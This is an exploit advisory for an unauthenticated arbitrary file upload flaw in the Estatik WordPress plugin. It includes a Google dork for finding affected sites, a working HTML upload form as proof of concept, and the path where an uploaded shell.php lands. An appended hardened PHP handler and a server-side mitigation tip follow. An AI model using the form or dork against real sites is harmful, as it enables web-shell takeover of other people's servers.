- <!--
- \ \ / (_)_ __ _ _ ___\ \/ / _ \ ____
- \ \ / /| | '__| | | / __|\ /| | | |_ /
- \ V / | | | | |_| \__ \/ \| |_| |/ /
- \_/ |_|_| \__,_|___/_/\_\____//___|
- -->
- #########################################################
- #Exploit Title: Arbitrary File Upload Vulnerability in Estatik
- #Category: webapps
- #Google Dork : inurl:/wp-content/plugins/estatik/
- : index of "/wp-content/plugins/estatik/"
- #########################################################
- [+] In that function the following code saves an uploaded file sent with a request to the AJAX function:
- $image_name = time()."_".$_FILES['es_media_images']['name'][$i];
- $sourcePath = $_FILES['es_media_images']['tmp_name'][$i];
- $targetPath = $upload_dir['path']."/".$image_name;
- move_uploaded_file($sourcePath,$targetPath) ;
- [+] Proof of Concept:
- The following proof of concept will upload the selected file and put it in the current
- month’s directory inside of the /wp-content/uploads/ directory.
- The name of the file in the upload directory will be the time the file
- was saved, as output by the function time(), followed by a “_”
- and then the name of the file as it was uploaded.
- Make sure to replace “[path to WordPress]” with the location of WordPress.
- <html>
- <body>
- <form action="http://[path to WordPress]/wp-admin/admin-ajax.php" method="POST" enctype="multipart/form-data">
- <input type="hidden" name="action" value="es_prop_media_images" />
- <input type="file" name="es_media_images[]" />
- <input type="submit" value="Submit" />
- </form>
- </body>
- </html>
- [+]shell access:
- http://www.Target.com/wp-content/uploads/time/shell.php
- Video
- https://youtu.be/G80_JRsuY88
- Bye..
- Algerien Hacker
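
A hardened form of the upload loop quoted above, as an added example that is not the plugin's own code or part of the original advisory. It assumes uploads should be limited to logged-in users holding the `upload_files` capability and to JPEG/PNG/GIF images; the function name `es_safe_media_upload`, the nonce action `es_media_upload` and the `nonce` request field are hypothetical.

```php
<?php
// Added example (not Estatik's code). The quoted loop keeps the client-supplied
// file name, extension included, and performs no type check, so a .php file is
// written into the web-served uploads directory. This handler closes both gaps.

// Register only the authenticated hook; no wp_ajax_nopriv_ counterpart.
add_action( 'wp_ajax_es_prop_media_images', 'es_safe_media_upload' );

function es_safe_media_upload() {
    // Reject cross-site and unauthorized requests before touching $_FILES.
    check_ajax_referer( 'es_media_upload', 'nonce' ); // hypothetical nonce action/field
    if ( ! current_user_can( 'upload_files' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }
    if ( empty( $_FILES['es_media_images']['name'] )
        || ! is_array( $_FILES['es_media_images']['name'] ) ) {
        wp_send_json_error( 'no files', 400 );
    }

    require_once ABSPATH . 'wp-admin/includes/file.php'; // provides wp_handle_upload()

    // Assumed allowlist: extension pattern => MIME type.
    $allowed = array(
        'jpg|jpeg' => 'image/jpeg',
        'png'      => 'image/png',
        'gif'      => 'image/gif',
    );

    $files = $_FILES['es_media_images'];
    $saved = array();
    foreach ( $files['name'] as $i => $name ) {
        // Rebuild one single-file entry from the es_media_images[] arrays.
        $file = array(
            'name'     => sanitize_file_name( $name ),
            'type'     => $files['type'][ $i ],
            'tmp_name' => $files['tmp_name'][ $i ],
            'error'    => $files['error'][ $i ],
            'size'     => $files['size'][ $i ],
        );
        // wp_handle_upload() checks extension and content type against the
        // allowlist and picks a unique name inside the uploads directory.
        $result = wp_handle_upload( $file, array( 'test_form' => false, 'mimes' => $allowed ) );
        if ( isset( $result['error'] ) ) {
            wp_send_json_error( $result['error'], 400 );
        }
        $saved[] = $result['url'];
    }
    wp_send_json_success( $saved );
}
```

Disabling PHP execution for /wp-content/uploads/ at the web server is a useful second layer, since it keeps a stray script from running even if one reaches the directory.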